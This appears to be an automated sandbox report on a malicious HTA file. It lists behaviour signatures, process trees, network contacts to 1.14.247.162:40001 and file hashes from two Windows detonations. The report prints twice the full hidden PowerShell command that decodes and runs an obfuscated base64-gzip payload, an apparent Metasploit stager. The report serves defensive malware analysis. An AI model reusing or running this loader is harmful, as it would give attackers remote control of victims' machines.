Analysis Overview
SHA256
8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3
Threat Level: Known bad
The file 8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-31 01:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 01:24
Reported
2024-05-31 01:26
Platform
win7-20240221-en
Max time kernel
132s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMEP12UCA7VWbW/aSBD{1}Xq'+'n/waqQbKsEm5c2TaRKt8YBnAQCcYAAh04be7G3WXuJvQ6hvf73m8V2SK/JXe6kWkrYl5nZ2WeemdlVFnuC8ljZOsq3t2{1}U4hviBEeKVrk/x1WlEt'+'r6fquyTrnyWdEWaL22eYRpvDw{1}bm'+'dJQmKRz2tdIlCakuiGUZJquvKnMg1JQg4ubr4QTyjflMoftS7jN5gVYts29kKiHKDYl3vn3MPSqZq7ZlRo6u{1}/q/rioL6sndxlmKWa6m5TQaKaz5iqK991'+'eeDVdk00tU{1}9hKd8JWpTGjcbtXGc4hUZgLV70ici5H6qwl32t0mIyJJ4dylpJZfRVBgOE{1}4h309ImqpVZSHtL5bL37RFcfhlFgsakZoTC5LwtUuSe{1}qRtNbDsc/IJVktQcsVCY2Dpa6D2D2/JVolzhi'+'rKv/Fj'+'DYgmxK61yppT5VAaigSvQrx/Pmafe5njOSK6jN{1}Sgro8OU0AOy{1}S/hWJW1uu'+'vWzZ4izXyi/xW6HgL/akKd0p/xZMatKH47GgidbmFaukozoy0e0lUrS{1}zCPq681Vy91QfMuhIXFhFN/uVf/IfaVsHkS2FLqZSrbZEV'+'jYm9jHFGvZKv2XEjIipEdJrVSbAAOamqxQXybMBJgIVGWzPhJ7SSi4lHXyijzSYI8CGsKXkHE9R{1}dyQOnq'+'U7cJxHAl8{1}BqpUV5AgppYu82JanyzkIqW2G07S'+'qDDNIUq{1}quAQz4lcVFKe02EKZ4Luhune3nzFBPZyK0txS/zuexbltHqciyTyILGBw5a6JRzGTkFSVHvWJtXVpUJ6vPgtIGzMG2QOW7iEgsCKBcIXkSwKu5tzQay4RTrRmJA'+'KhXdnoMBxAkSiSZMcwHBBffcnVMht'+'y6ktwSlSeOAoRdxkXVWVCEwFVSAJ9F/4/L34uP7k77YQUEdLKRFtYWyEzoeI/SKIWIO0gSQTA0Ul4ZOGUfGzlpUZ7Z1zQIYJvZvfcuSPcPvzZTsxo3Rnbh/7ZKRfbM7tn9L12Oux2PiG6CTbepwHy/FOfHLmTlnBPHNEeot6ImlYr9CzzCsZjRzhdR8wc1LsKPWYOwYY7S0266U37nm193TRSoGur1bs2UbPZumiat4DejNaDW{1}QPIrp5OIcx1N'+'SLc8tJLdNhJ6fty5tpozOfsp7R6oSrKU/djzPbMIwjH9v9LUIW95v97XX9kl/1vMhqxdw4ardu0Ql'+'C7fhk0rH42cxK0NCY4GDN0eiwyaOgjU4fLErmo3HHGo06Fhp3v9zZR0ZgHE2vcWhNJw06X19fhjDvbHqjM8NsOT75yucbAK7LEQ4uQSZoN7xwBTL2e2S9H/C0gW8tjiyQ6czvUDecrTtDBvtX4wZHEza4xuh8vu0YRn02bKGeyafdAI1AHAfWCKP03v5qG/WJz/3ph8FsZUyu2aFht0fD8Fre2VhH8v{1}mZ5958/rGuzj8dD6lk4ijsWFM3gElFmMai2ZjWck2XVk9376pPHQn4yfMeKkz9HGShpgBY6Dml8nb4UmnKORDTq'+'WGpsE74J'+'YkMWHQPaG/lnRHjHFPtpBdwYf2lTcV2ePGzs6n50a68iio73tLuXR8PAcfIYX8h9o5iQMRVs2HpmlCUzAfzNYuUV5/rzZfbzUwVZVNZQdLbpntLIMxulI07VfjBK8GAeXrZaReAg1OvoVaA{1}Uvz38JncU5ewpcca'+'tHFuxxA8DqcO2FfC9IcoD6AblTKkL206f9uXIzuf{1}VdClKWAg//r/R'+'Zb/2D7uvopBZzaH5afnHhScN4JcBMMVUgJwL'+'tZiR/InwPA5FhjyJLoQGEmBVfPLZfJGJgwE8xHbN4C8XDoWSqwsAAA{0}{0}')-f'=','+')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| CN | 1.14.247.162:40001 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 985cd0dc8ffb66e582df00c5c27de512 |
| SHA1 | e5c4a366f9349c5a01c0b7fdec94339cf88ae801 |
| SHA256 | 157fee899ba6fc9b97b055d734fe58995d18990c49cdb2043aa6648f0c02cc7f |
| SHA512 | d56d55ea6841dc39e6af384c59b4705b77bffaaaf9a42d2ffe98ca35da56f9922f7ffa47f732bb17ee5007a1aceb2c3b308bea2c652e6bf2d224b14b46129738 |
memory/2872-7-0x0000000005040000-0x0000000005041000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-31 01:24
Reported
2024-05-31 01:26
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 728 wrote to memory of 964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 4408 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMEP12UCA7VWbW/aSBD{1}Xq'+'n/waqQbKsEm5c2TaRKt8YBnAQCcYAAh04be7G3WXuJvQ6hvf73m8V2SK/JXe6kWkrYl5nZ2WeemdlVFnuC8ljZOsq3t2{1}U4hviBEeKVrk/x1WlEt'+'r6fquyTrnyWdEWaL22eYRpvDw{1}bm'+'dJQmKRz2tdIlCakuiGUZJquvKnMg1JQg4ubr4QTyjflMoftS7jN5gVYts29kKiHKDYl3vn3MPSqZq7ZlRo6u{1}/q/rioL6sndxlmKWa6m5TQaKaz5iqK991'+'eeDVdk00tU{1}9hKd8JWpTGjcbtXGc4hUZgLV70ici5H6qwl32t0mIyJJ4dylpJZfRVBgOE{1}4h309ImqpVZSHtL5bL37RFcfhlFgsakZoTC5LwtUuSe{1}qRtNbDsc/IJVktQcsVCY2Dpa6D2D2/JVolzhi'+'rKv/Fj'+'DYgmxK61yppT5VAaigSvQrx/Pmafe5njOSK6jN{1}Sgro8OU0AOy{1}S/hWJW1uu'+'vWzZ4izXyi/xW6HgL/akKd0p/xZMatKH47GgidbmFaukozoy0e0lUrS{1}zCPq681Vy91QfMuhIXFhFN/uVf/IfaVsHkS2FLqZSrbZEV'+'jYm9jHFGvZKv2XEjIipEdJrVSbAAOamqxQXybMBJgIVGWzPhJ7SSi4lHXyijzSYI8CGsKXkHE9R{1}dyQOnq'+'U7cJxHAl8{1}BqpUV5AgppYu82JanyzkIqW2G07S'+'qDDNIUq{1}quAQz4lcVFKe02EKZ4Luhune3nzFBPZyK0txS/zuexbltHqciyTyILGBw5a6JRzGTkFSVHvWJtXVpUJ6vPgtIGzMG2QOW7iEgsCKBcIXkSwKu5tzQay4RTrRmJA'+'KhXdnoMBxAkSiSZMcwHBBffcnVMht'+'y6ktwSlSeOAoRdxkXVWVCEwFVSAJ9F/4/L34uP7k77YQUEdLKRFtYWyEzoeI/SKIWIO0gSQTA0Ul4ZOGUfGzlpUZ7Z1zQIYJvZvfcuSPcPvzZTsxo3Rnbh/7ZKRfbM7tn9L12Oux2PiG6CTbepwHy/FOfHLmTlnBPHNEeot6ImlYr9CzzCsZjRzhdR8wc1LsKPWYOwYY7S0266U37nm193TRSoGur1bs2UbPZumiat4DejNaDW{1}QPIrp5OIcx1N'+'SLc8tJLdNhJ6fty5tpozOfsp7R6oSrKU/djzPbMIwjH9v9LUIW95v97XX9kl/1vMhqxdw4ardu0Ql'+'C7fhk0rH42cxK0NCY4GDN0eiwyaOgjU4fLErmo3HHGo06Fhp3v9zZR0ZgHE2vcWhNJw06X19fhjDvbHqjM8NsOT75yucbAK7LEQ4uQSZoN7xwBTL2e2S9H/C0gW8tjiyQ6czvUDecrTtDBvtX4wZHEza4xuh8vu0YRn02bKGeyafdAI1AHAfWCKP03v5qG/WJz/3ph8FsZUyu2aFht0fD8Fre2VhH8v{1}mZ5958/rGuzj8dD6lk4ijsWFM3gElFmMai2ZjWck2XVk9376pPHQn4yfMeKkz9HGShpgBY6Dml8nb4UmnKORDTq'+'WGpsE74J'+'YkMWHQPaG/lnRHjHFPtpBdwYf2lTcV2ePGzs6n50a68iio73tLuXR8PAcfIYX8h9o5iQMRVs2HpmlCUzAfzNYuUV5/rzZfbzUwVZVNZQdLbpntLIMxulI07VfjBK8GAeXrZaReAg1OvoVaA{1}Uvz38JncU5ewpcca'+'tHFuxxA8DqcO2FfC9IcoD6AblTKkL206f9uXIzuf{1}VdClKWAg//r/R'+'Zb/2D7uvopBZzaH5afnHhScN4JcBMMVUgJwL'+'tZiR/InwPA5FhjyJLoQGEmBVfPLZfJGJgwE8xHbN4C8XDoWSqwsAAA{0}{0}')-f'=','+')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| CN | 1.14.247.162:40001 | | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/964-0-0x0000000074E6E000-0x0000000074E6F000-memory.dmp
memory/964-1-0x0000000002780000-0x00000000027B6000-memory.dmp
memory/964-2-0x0000000005420000-0x0000000005A48000-memory.dmp
memory/964-3-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/964-4-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/964-5-0x00000000051E0000-0x0000000005202000-memory.dmp
memory/964-6-0x0000000005280000-0x00000000052E6000-memory.dmp
memory/964-7-0x00000000052F0000-0x0000000005356000-memory.dmp
memory/964-8-0x0000000005A50000-0x0000000005DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhsxbzhn.wqy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/964-18-0x0000000006070000-0x000000000608E000-memory.dmp
memory/964-19-0x00000000060C0000-0x000000000610C000-memory.dmp
memory/964-20-0x00000000079D0000-0x000000000804A000-memory.dmp
memory/964-21-0x00000000065C0000-0x00000000065DA000-memory.dmp
memory/964-24-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/4408-34-0x0000000006080000-0x00000000063D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a98089c2a26f51e109d8d675b7a0f279 |
| SHA1 | 51deee62c2d03edae85a91df86ca07959da46df4 |
| SHA256 | 0cc64b0509b0f9f8703daf833b879aaebd2ad923ef75f0c73dc07c9cfbd3f1df |
| SHA512 | b1c7f14d28949bef0c329bc7bc240e00db3a158161a279cd481d656d15da5fbf4c7235244e62a4a5dbca7c3a4ab66cfd8e1eeb9a58659b599af5c140f0cc39a5 |
memory/4408-36-0x0000000006CD0000-0x0000000006D1C000-memory.dmp
memory/4408-37-0x0000000006530000-0x0000000006531000-memory.dmp